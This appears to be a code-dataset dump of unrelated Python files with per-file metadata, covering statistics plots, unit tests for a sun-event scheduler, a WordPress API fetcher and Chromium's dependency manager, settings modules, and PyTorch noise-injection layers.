t, p = ttest_ind(error_old_pca_r1[idx_healthy_old_ms_2], error_ms_pca_r1_2 - y_ms_2)
sns.boxplot(data=[error_old_pca_r1[idx_healthy_old_ms_2] , error_ms_pca_r1_2 - y_ms_2], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms2_stats_pca_' + str(p) + '.svg', format='svg')
plt.close()
# error_old_en_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_en_r1[idx_healthy_old_ms_1], error_ms_en_r1_1 - y_ms_1) # np.delete(error_ms_en_r1_1, [1,4]) - np.delete(y_ms_1, [1,4]) # removing outliers, still significant
sns.boxplot(data=[error_old_en_r1[idx_healthy_old_ms_1] , error_ms_en_r1_1 - y_ms_1], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms1_stats_en_' + str(p) + '.svg', format='svg')
plt.close()
# error_old_en_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_en_r1[idx_healthy_old_ms_2], error_ms_en_r1_2 - y_ms_2)
sns.boxplot(data=[error_old_en_r1[idx_healthy_old_ms_2] , error_ms_en_r1_2 - y_ms_2], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms2_stats_en_' + str(p) + '.svg', format='svg')
plt.close()
| 38.0798
| 188
| 0.731631
| 2,719
| 15,270
| 3.770504
| 0.10445
| 0.031213
| 0.02341
| 0.02224
| 0.862076
| 0.829692
| 0.809208
| 0.792626
| 0.769216
| 0.76112
| 0
| 0.060795
| 0.126392
| 15,270
| 400
| 189
| 38.175
| 0.707721
| 0.117682
| 0
| 0.65529
| 0
| 0
| 0.089814
| 0.047354
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.03413
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
339217ea41d133c1c8709d60fdba6df716eb8538
| 130
|
py
|
Python
|
solutions/day9/solver.py
|
NunoMCSilva/My-Advent-of-Code-2017-Solutions
|
df818a2f7a733834d352b8fabcd340d75de8c0b1
|
[
"MIT"
] | null | null | null |
solutions/day9/solver.py
|
NunoMCSilva/My-Advent-of-Code-2017-Solutions
|
df818a2f7a733834d352b8fabcd340d75de8c0b1
|
[
"MIT"
] | null | null | null |
solutions/day9/solver.py
|
NunoMCSilva/My-Advent-of-Code-2017-Solutions
|
df818a2f7a733834d352b8fabcd340d75de8c0b1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from solutions.day9.solver1 import part1
from solutions.day9.solver2 import part2
| 21.666667
| 40
| 0.738462
| 19
| 130
| 5.052632
| 0.789474
| 0.270833
| 0.354167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 0.123077
| 130
| 5
| 41
| 26
| 0.77193
| 0.330769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d501e3a8dda91b49207a6b76eda6e0b3534948e8
| 1,878
|
py
|
Python
|
solarblinds2/tests/test_events.py
|
lalten/solar-blinds-2
|
5dc9155b1ca582a4b12e6928c4f1641d7ffe7a81
|
[
"MIT"
] | null | null | null |
solarblinds2/tests/test_events.py
|
lalten/solar-blinds-2
|
5dc9155b1ca582a4b12e6928c4f1641d7ffe7a81
|
[
"MIT"
] | null | null | null |
solarblinds2/tests/test_events.py
|
lalten/solar-blinds-2
|
5dc9155b1ca582a4b12e6928c4f1641d7ffe7a81
|
[
"MIT"
] | null | null | null |
import datetime
from solarblinds2.events import get_next_sun_event_time_and_type
import astral
import solarblinds2.config
def test_get_next_sun_event_time_and_type_happy() -> None:
observer = astral.Observer()
now = datetime.datetime(year=2000, month=1, day=1, hour=0, tzinfo=datetime.timezone.utc)
date, type = get_next_sun_event_time_and_type(observer, now)
assert date == datetime.datetime(2000, 1, 1, 8, 5, 57, 311165, tzinfo=datetime.timezone.utc)
assert type == solarblinds2.config.EventType.SUNRISE
now = datetime.datetime(year=2000, month=1, day=1, hour=12, tzinfo=datetime.timezone.utc)
date, type = get_next_sun_event_time_and_type(observer, now)
assert date == datetime.datetime(2000, 1, 1, 16, 0, 49, 698951, tzinfo=datetime.timezone.utc)
assert type == solarblinds2.config.EventType.SUNSET
def test_get_next_sun_event_time_and_type_close_to_event() -> None:
observer = astral.Observer()
now = datetime.datetime(2000, 1, 1, 8, 5, 57, 311165 - 1, tzinfo=datetime.timezone.utc)
date, type = get_next_sun_event_time_and_type(observer, now)
assert date == datetime.datetime(2000, 1, 1, 8, 5, 57, 311165, tzinfo=datetime.timezone.utc)
assert type == solarblinds2.config.EventType.SUNRISE
now = datetime.datetime(2000, 1, 1, 8, 5, 57, 311165, tzinfo=datetime.timezone.utc)
date, type = get_next_sun_event_time_and_type(observer, now)
assert date == datetime.datetime(2000, 1, 1, 16, 0, 49, 698951, tzinfo=datetime.timezone.utc)
assert type == solarblinds2.config.EventType.SUNSET
now = datetime.datetime(2000, 1, 1, 8, 5, 57, 311165 + 1, tzinfo=datetime.timezone.utc)
date, type = get_next_sun_event_time_and_type(observer, now)
assert date == datetime.datetime(2000, 1, 1, 16, 0, 49, 698951, tzinfo=datetime.timezone.utc)
assert type == solarblinds2.config.EventType.SUNSET
| 49.421053
| 97
| 0.740149
| 282
| 1,878
| 4.737589
| 0.159574
| 0.11976
| 0.164671
| 0.187126
| 0.926647
| 0.926647
| 0.926647
| 0.868263
| 0.868263
| 0.818862
| 0
| 0.096333
| 0.143237
| 1,878
| 37
| 98
| 50.756757
| 0.733996
| 0
| 0
| 0.607143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.357143
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d1b44670f2306f8549db3134853beb5d488da2d
| 21
|
py
|
Python
|
config/prod.py
|
TenPennyTV/flask-ffmpeg
|
476e20bb682b60c76dff2b8bc1c7980b9c5a47f7
|
[
"MIT"
] | null | null | null |
config/prod.py
|
TenPennyTV/flask-ffmpeg
|
476e20bb682b60c76dff2b8bc1c7980b9c5a47f7
|
[
"MIT"
] | null | null | null |
config/prod.py
|
TenPennyTV/flask-ffmpeg
|
476e20bb682b60c76dff2b8bc1c7980b9c5a47f7
|
[
"MIT"
] | null | null | null |
bind = "0.0.0.0:8090"
| 21
| 21
| 0.571429
| 6
| 21
| 2
| 0.5
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.421053
| 0.095238
| 21
| 1
| 21
| 21
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d9d93a9ff1fa1ce796347478b936cd62e563b34
| 116
|
py
|
Python
|
andorra/settings/staging.py
|
TheProrok29/andorra
|
895ac07a85e8dc36f21a74f77312adc73fded459
|
[
"MIT"
] | null | null | null |
andorra/settings/staging.py
|
TheProrok29/andorra
|
895ac07a85e8dc36f21a74f77312adc73fded459
|
[
"MIT"
] | 4
|
2020-06-07T10:23:51.000Z
|
2021-09-22T19:09:32.000Z
|
andorra/settings/staging.py
|
TheProrok29/andorra
|
895ac07a85e8dc36f21a74f77312adc73fded459
|
[
"MIT"
] | null | null | null |
# flake8: noqa
import django_heroku
from .development import *
django_heroku.settings(locals(), test_runner=False)
| 19.333333
| 51
| 0.801724
| 15
| 116
| 6
| 0.8
| 0.266667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009615
| 0.103448
| 116
| 5
| 52
| 23.2
| 0.855769
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d5491be816d0758a508c5bf81c463d7d56b6b3fe
| 4,122
|
py
|
Python
|
testapp/wagtail_wordpress_importer/test/api_fetcher_tests.py
|
nickmoreton/wagtail_wordpress_importer
|
fbe6b60ae624edac3f42a62ce30af4a0c548b4ed
|
[
"MIT"
] | null | null | null |
testapp/wagtail_wordpress_importer/test/api_fetcher_tests.py
|
nickmoreton/wagtail_wordpress_importer
|
fbe6b60ae624edac3f42a62ce30af4a0c548b4ed
|
[
"MIT"
] | null | null | null |
testapp/wagtail_wordpress_importer/test/api_fetcher_tests.py
|
nickmoreton/wagtail_wordpress_importer
|
fbe6b60ae624edac3f42a62ce30af4a0c548b4ed
|
[
"MIT"
] | null | null | null |
from django.test import SimpleTestCase
from wagtail_wordpress_importer.cls.api_fetcher import WordpressApiFetcher
class ApiFetcherTestCase(SimpleTestCase):
def test_get_page_headers(self):
api_fetcher = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/wp-json/wp/v2/pages?page=1'
)
self.assertEqual(api_fetcher.content_type,
'application/json; charset=UTF-8')
self.assertGreater(api_fetcher.total_results, 0)
self.assertGreater(api_fetcher.total_pages, 0)
def test_parse_headers_link(self):
# page 1
api_fetcher_one = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/wp-json/wp/v2/pages?page=1'
)
expected_next = 'https://www.england.nhs.uk/wp-json/wp/v2/pages?page=2'
self.assertEqual(api_fetcher_one.next_url, expected_next)
expected_prev = None
self.assertEqual(api_fetcher_one.prev_url, expected_prev)
# page 2
api_fetcher_two = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/wp-json/wp/v2/pages?page=2'
)
expected_next = 'https://www.england.nhs.uk/wp-json/wp/v2/pages?page=3'
self.assertEqual(api_fetcher_two.next_url, expected_next)
expected_prev = 'https://www.england.nhs.uk/wp-json/wp/v2/pages?page=1'
self.assertEqual(api_fetcher_two.prev_url, expected_prev)
# last page
api_fetcher_get_last = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/wp-json/wp/v2/pages?page=1'
)
last_page = api_fetcher_get_last.total_pages
api_fetcher_last_page = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/wp-json/wp/v2/pages?page={}'.format(
last_page)
)
expected_next = None
self.assertEqual(api_fetcher_last_page.next_url, expected_next)
expected_previous = 'https://www.england.nhs.uk/wp-json/wp/v2/pages?page={}'.format(
last_page-1)
self.assertEqual(api_fetcher_last_page.prev_url, expected_previous)
def test_get_page_headers_subsite(self):
api_fetcher = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=1'
)
self.assertEqual(api_fetcher.content_type,
'application/json; charset=UTF-8')
self.assertGreater(api_fetcher.total_results, 0)
self.assertGreater(api_fetcher.total_pages, 0)
def test_parse_headers_link_subsite(self):
# page 1
api_fetcher_one = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=1'
)
expected_next = 'https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=2'
self.assertEqual(api_fetcher_one.next_url, expected_next)
expected_prev = None
self.assertEqual(api_fetcher_one.prev_url, expected_prev)
# page 2
api_fetcher_two = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=2'
)
expected_next = 'https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=3'
self.assertEqual(api_fetcher_two.next_url, expected_next)
expected_prev = 'https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=1'
self.assertEqual(api_fetcher_two.prev_url, expected_prev)
# last page
api_fetcher_get_last = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=1'
)
last_page = api_fetcher_get_last.total_pages
api_fetcher_last_page = WordpressApiFetcher(
base_url='https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page={}'.format(
last_page)
)
expected_next = None
self.assertEqual(api_fetcher_last_page.next_url, expected_next)
expected_previous = 'https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page={}'.format(
last_page-1)
self.assertEqual(api_fetcher_last_page.prev_url, expected_previous)
| 40.411765
| 96
| 0.665454
| 558
| 4,122
| 4.666667
| 0.102151
| 0.119048
| 0.103687
| 0.124424
| 0.942012
| 0.925883
| 0.925883
| 0.925883
| 0.925883
| 0.925883
| 0
| 0.013639
| 0.21737
| 4,122
| 101
| 97
| 40.811881
| 0.793552
| 0.011402
| 0
| 0.613333
| 0
| 0.24
| 0.259651
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.053333
| false
| 0
| 0.026667
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5744170a3aaaf1946c976b300943d14b46ef9eb
| 5,141
|
py
|
Python
|
cnns/nnlib/robustness/pni/code/models/noise_layer_both.py
|
anonymous-user-commits/perturb-net
|
66fc7c4a1234fa34b92bcc85751f0a6e23d80a23
|
[
"MIT"
] | null | null | null |
cnns/nnlib/robustness/pni/code/models/noise_layer_both.py
|
anonymous-user-commits/perturb-net
|
66fc7c4a1234fa34b92bcc85751f0a6e23d80a23
|
[
"MIT"
] | null | null | null |
cnns/nnlib/robustness/pni/code/models/noise_layer_both.py
|
anonymous-user-commits/perturb-net
|
66fc7c4a1234fa34b92bcc85751f0a6e23d80a23
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import math
import torch.nn.functional as F
import torch
import numpy as np
global_noise_type = 'both'
class noise_Linear(nn.Linear):
def __init__(self, in_features, out_features, bias=True, pni='layerwise',
w_noise=True, noise_type=global_noise_type, input_size=None):
"""
:param in_features:
:param out_features:
:param bias:
:param pni:
:param w_noise:
:param noise_type: weight or input or both
"""
super(noise_Linear, self).__init__(in_features, out_features, bias)
self.pni = pni
self.noise_type = noise_type
if self.pni is 'layerwise':
# noise scale for weights
if self.noise_type in ('weight', 'both'):
self.alpha_w = nn.Parameter(torch.Tensor([0.25]),
requires_grad=True)
# noise scale for inputs
if self.noise_type in ('input', 'both'):
self.alpha_i = nn.Parameter(torch.Tensor([0.25]),
requires_grad=True)
elif self.pni is 'channelwise':
self.alpha_w = nn.Parameter(
torch.ones(self.out_features).view(-1, 1) * 0.25,
requires_grad=True)
self.alpha_i = nn.Parameter(
torch.ones(self.in_features).view(-1, 1) * 0.25,
requires_grad=True)
elif self.pni is 'elementwise':
self.alpha_w = nn.Parameter(torch.ones(self.weight.size()) * 0.25,
requires_grad=True)
self.alpha_i = nn.Parameter(torch.ones(input_size) * 0.25,
requires_grad=True)
self.w_noise = w_noise
def forward(self, input):
if self.noise_type in ('weight', 'both'):
with torch.no_grad():
std = self.weight.std().item()
noise_weight = self.weight.clone().normal_(0, std)
noise_weight = self.weight + self.alpha_w * noise_weight * self.w_noise
else:
noise_weight = self.weight
if self.noise_type in ('input', 'both'):
with torch.no_grad():
std = input.std().item()
noise_input = input.clone().normal_(0, std)
noise_input = input + self.alpha_i * noise_input * self.w_noise
else:
noise_input = input
output = F.linear(noise_input, noise_weight, self.bias)
return output
class noise_Conv2d(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1,
groups=1, bias=True, pni='layerwise', w_noise=True,
noise_type=global_noise_type, input_size=None):
super(noise_Conv2d, self).__init__(in_channels, out_channels,
kernel_size, stride,
padding, dilation, groups, bias)
self.pni = pni
self.noise_type = noise_type
if self.pni is 'layerwise':
# noise scale for weights
if self.noise_type in ('weight', 'both'):
self.alpha_w = nn.Parameter(torch.Tensor([0.25]),
requires_grad=True)
# noise scale for inputs
if self.noise_type in ('input', 'both'):
self.alpha_i = nn.Parameter(torch.Tensor([0.25]),
requires_grad=True)
elif self.pni is 'channelwise':
self.alpha_w = nn.Parameter(
torch.ones(self.out_channels).view(-1, 1, 1, 1) * 0.25,
requires_grad=True)
self.alpha_i = nn.Parameter(
torch.ones(self.in_channels).view(-1, 1, 1, 1) * 0.25,
requires_grad=True)
elif self.pni is 'elementwise':
self.alpha_w = nn.Parameter(torch.ones(self.weight.size()) * 0.25,
requires_grad=True)
self.alpha_i = nn.Parameter(torch.ones(input_size) * 0.25,
requires_grad=True)
self.w_noise = w_noise
def forward(self, input):
if self.noise_type in ('weight', 'both'):
with torch.no_grad():
std = self.weight.std().item()
noise_weight = self.weight.clone().normal_(0, std)
noise_weight = self.weight + self.alpha_w * noise_weight * self.w_noise
else:
noise_weight = self.weight
if self.noise_type in ('input', 'both'):
with torch.no_grad():
std = input.std().item()
noise_input = input.clone().normal_(0, std)
noise_input = input + self.alpha_i * noise_input * self.w_noise
else:
noise_input = input
output = F.conv2d(noise_input, noise_weight, self.bias, self.stride,
self.padding, self.dilation,
self.groups)
return output
| 37.525547
| 83
| 0.529663
| 610
| 5,141
| 4.254098
| 0.114754
| 0.062428
| 0.073988
| 0.069364
| 0.833141
| 0.816956
| 0.794605
| 0.766089
| 0.766089
| 0.75684
| 0
| 0.018399
| 0.365688
| 5,141
| 136
| 84
| 37.801471
| 0.777369
| 0.042599
| 0
| 0.734694
| 0
| 0
| 0.032963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.05102
| 0
| 0.132653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d594ddeb6eadcdefca599856faefe588e83bdfa9
| 11,232
|
py
|
Python
|
chromium/tools/telemetry/catapult_base/dependency_manager/dependency_info_unittest.py
|
wedataintelligence/vivaldi-source
|
22a46f2c969f6a0b7ca239a05575d1ea2738768c
|
[
"BSD-3-Clause"
] | 27
|
2016-04-27T01:02:03.000Z
|
2021-12-13T08:53:19.000Z
|
chromium/tools/telemetry/catapult_base/dependency_manager/dependency_info_unittest.py
|
wedataintelligence/vivaldi-source
|
22a46f2c969f6a0b7ca239a05575d1ea2738768c
|
[
"BSD-3-Clause"
] | 2
|
2017-03-09T09:00:50.000Z
|
2017-09-21T15:48:20.000Z
|
chromium/tools/telemetry/catapult_base/dependency_manager/dependency_info_unittest.py
|
wedataintelligence/vivaldi-source
|
22a46f2c969f6a0b7ca239a05575d1ea2738768c
|
[
"BSD-3-Clause"
] | 17
|
2016-04-27T02:06:39.000Z
|
2019-12-18T08:07:00.000Z
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from catapult_base import dependency_manager
class DependencyInfoTest(unittest.TestCase):
def testInitRequiredInfo(self):
# Must have a dependency, platform and file_path.
self.assertRaises(ValueError, dependency_manager.DependencyInfo,
None, None, None)
self.assertRaises(ValueError, dependency_manager.DependencyInfo,
'dep', None, None)
self.assertRaises(ValueError, dependency_manager.DependencyInfo,
None, 'plat', None)
self.assertRaises(ValueError, dependency_manager.DependencyInfo,
None, None, 'config_path')
# Empty DependencyInfo.
empty_di = dependency_manager.DependencyInfo('dep', 'plat', 'config_path')
self.assertEqual('dep', empty_di.dependency)
self.assertEqual('plat', empty_di.platform)
self.assertEqual(['config_path'], empty_di.config_paths)
self.assertFalse(empty_di.has_local_path_info)
self.assertFalse(empty_di.has_cloud_storage_info)
def testInitLocalPaths(self):
local_path_info = dependency_manager.LocalPathInfo(['path0', 'path1'])
dep_info = dependency_manager.DependencyInfo(
'dep', 'platform', 'config_path', local_path_info
)
self.assertEqual('dep', dep_info.dependency)
self.assertEqual('platform', dep_info.platform)
self.assertEqual(['config_path'], dep_info.config_paths)
self.assertEqual(local_path_info, dep_info._local_path_info)
self.assertFalse(dep_info.has_cloud_storage_info)
def testInitCloudStorageInfo(self):
cs_info = dependency_manager.CloudStorageInfo(
'cs_bucket', 'cs_hash', 'dowload_path', 'cs_remote_path')
dep_info = dependency_manager.DependencyInfo(
'dep', 'platform', 'config_path', cloud_storage_info=cs_info)
self.assertEqual('dep', dep_info.dependency)
self.assertEqual('platform', dep_info.platform)
self.assertEqual(['config_path'], dep_info.config_paths)
self.assertFalse(dep_info.has_local_path_info)
self.assertTrue(dep_info.has_cloud_storage_info)
self.assertEqual(cs_info, dep_info._cloud_storage_info)
def testInitAllInfo(self):
cs_info = dependency_manager.CloudStorageInfo(
'cs_bucket', 'cs_hash', 'dowload_path', 'cs_remote_path')
dep_info = dependency_manager.DependencyInfo(
'dep', 'platform', 'config_path', cloud_storage_info=cs_info)
self.assertEqual('dep', dep_info.dependency)
self.assertEqual('platform', dep_info.platform)
self.assertEqual(['config_path'], dep_info.config_paths)
self.assertFalse(dep_info.has_local_path_info)
self.assertTrue(dep_info.has_cloud_storage_info)
def testUpdateRequiredArgsConflicts(self):
lp_info = dependency_manager.LocalPathInfo(['path0', 'path2'])
dep_info1 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path1', local_path_info=lp_info)
dep_info2 = dependency_manager.DependencyInfo(
'dep1', 'platform2', 'config_path2', local_path_info=lp_info)
dep_info3 = dependency_manager.DependencyInfo(
'dep2', 'platform1', 'config_path3', local_path_info=lp_info)
self.assertRaises(ValueError, dep_info1.Update, dep_info2)
self.assertRaises(ValueError, dep_info1.Update, dep_info3)
self.assertRaises(ValueError, dep_info3.Update, dep_info2)
def testUpdateMinimumCloudStorageInfo(self):
dep_info1 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path1')
cs_info2 = dependency_manager.CloudStorageInfo(
cs_bucket='cs_bucket2', cs_hash='cs_hash2',
download_path='download_path2', cs_remote_path='cs_remote_path2')
dep_info2 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path2', cloud_storage_info=cs_info2)
dep_info3 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path3')
cs_info4 = dependency_manager.CloudStorageInfo(
cs_bucket='cs_bucket4', cs_hash='cs_hash4',
download_path='download_path4', cs_remote_path='cs_remote_path4')
dep_info4 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path4', cloud_storage_info=cs_info4)
self.assertEqual('dep1', dep_info1.dependency)
self.assertEqual('platform1', dep_info1.platform)
self.assertEqual(['config_path1'], dep_info1.config_paths)
dep_info1.Update(dep_info2)
self.assertFalse(dep_info1.has_local_path_info)
self.assertEqual('dep1', dep_info1.dependency)
self.assertEqual('platform1', dep_info1.platform)
self.assertEqual(['config_path1', 'config_path2'], dep_info1.config_paths)
cs_info = dep_info1._cloud_storage_info
self.assertEqual(cs_info, cs_info2)
self.assertEqual('cs_bucket2', cs_info._cs_bucket)
self.assertEqual('cs_hash2', cs_info._cs_hash)
self.assertEqual('download_path2', cs_info._download_path)
self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
dep_info1.Update(dep_info3)
self.assertEqual('dep1', dep_info1.dependency)
self.assertEqual('platform1', dep_info1.platform)
self.assertEqual(['config_path1', 'config_path2', 'config_path3'],
dep_info1.config_paths)
self.assertFalse(dep_info1.has_local_path_info)
cs_info = dep_info1._cloud_storage_info
self.assertEqual(cs_info, cs_info2)
self.assertEqual('cs_bucket2', cs_info._cs_bucket)
self.assertEqual('cs_hash2', cs_info._cs_hash)
self.assertEqual('download_path2', cs_info._download_path)
self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
self.assertRaises(ValueError, dep_info1.Update, dep_info4)
def testUpdateMaxCloudStorageInfo(self):
dep_info1 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path1')
zip_info2 = dependency_manager.ArchiveInfo(
'archive_path2', 'unzip_path2', 'path_withing_archive2')
cs_info2 = dependency_manager.CloudStorageInfo(
'cs_bucket2', 'cs_hash2', 'download_path2', 'cs_remote_path2',
version_in_cs='2.1.1', archive_info=zip_info2)
dep_info2 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path2', cloud_storage_info=cs_info2)
dep_info3 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path3')
zip_info4 = dependency_manager.ArchiveInfo(
'archive_path4', 'unzip_path4', 'path_withing_archive4')
cs_info4 = dependency_manager.CloudStorageInfo(
'cs_bucket4', 'cs_hash4', 'download_path4', 'cs_remote_path4',
version_in_cs='4.2.1', archive_info=zip_info4)
dep_info4 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path4', cloud_storage_info=cs_info4)
self.assertEqual('dep1', dep_info1.dependency)
self.assertEqual('platform1', dep_info1.platform)
self.assertEqual(['config_path1'], dep_info1.config_paths)
dep_info1.Update(dep_info2)
self.assertFalse(dep_info1.has_local_path_info)
self.assertEqual('dep1', dep_info1.dependency)
self.assertEqual('platform1', dep_info1.platform)
self.assertEqual(['config_path1', 'config_path2'], dep_info1.config_paths)
cs_info = dep_info1._cloud_storage_info
self.assertEqual(cs_info, cs_info2)
self.assertEqual('cs_bucket2', cs_info._cs_bucket)
self.assertEqual('cs_hash2', cs_info._cs_hash)
self.assertEqual('download_path2', cs_info._download_path)
self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
dep_info1.Update(dep_info3)
self.assertEqual('dep1', dep_info1.dependency)
self.assertEqual('platform1', dep_info1.platform)
self.assertEqual(['config_path1', 'config_path2', 'config_path3'],
dep_info1.config_paths)
self.assertFalse(dep_info1.has_local_path_info)
cs_info = dep_info1._cloud_storage_info
self.assertEqual(cs_info, cs_info2)
self.assertEqual('cs_bucket2', cs_info._cs_bucket)
self.assertEqual('cs_hash2', cs_info._cs_hash)
self.assertEqual('download_path2', cs_info._download_path)
self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
self.assertRaises(ValueError, dep_info1.Update, dep_info4)
def testUpdateAllInfo(self):
lp_info1 = dependency_manager.LocalPathInfo(['path1'])
dep_info1 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path1', local_path_info=lp_info1)
cs_info2 = dependency_manager.CloudStorageInfo(
cs_bucket='cs_bucket2', cs_hash='cs_hash2',
download_path='download_path2', cs_remote_path='cs_remote_path2')
lp_info2 = dependency_manager.LocalPathInfo(['path2'])
dep_info2 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path2', local_path_info=lp_info2,
cloud_storage_info=cs_info2)
lp_info3 = dependency_manager.LocalPathInfo(['path3'])
dep_info3 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path3', local_path_info=lp_info3)
lp_info4 = dependency_manager.LocalPathInfo(['path4'])
cs_info4 = dependency_manager.CloudStorageInfo(
cs_bucket='cs_bucket4', cs_hash='cs_hash4',
download_path='download_path4', cs_remote_path='cs_remote_path4')
dep_info4 = dependency_manager.DependencyInfo(
'dep1', 'platform1', 'config_path4', local_path_info=lp_info4,
cloud_storage_info=cs_info4)
self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path1'))
self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path2'))
self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path3'))
self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path4'))
dep_info1.Update(dep_info2)
cs_info = dep_info1._cloud_storage_info
self.assertEqual(cs_info, cs_info2)
self.assertEqual('cs_bucket2', cs_info._cs_bucket)
self.assertEqual('cs_hash2', cs_info._cs_hash)
self.assertEqual('download_path2', cs_info._download_path)
self.assertEqual('cs_remote_path2', cs_info._cs_remote_path)
self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path1'))
self.assertTrue(dep_info1._local_path_info.IsPathInLocalPaths('path2'))
self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path3'))
self.assertFalse(dep_info1._local_path_info.IsPathInLocalPaths('path4'))
dep_info1.Update(dep_info3)
cs_info = dep_info1._cloud_storage_info
self.assertEqual(cs_info, cs_info2)
self.assertEqual('cs_bucket2', cs_info._cs_bucket)
self.assertEqual('cs_hash2', cs_info._cs_hash)
self.assertEqual('download_path2', cs_info._download_path)
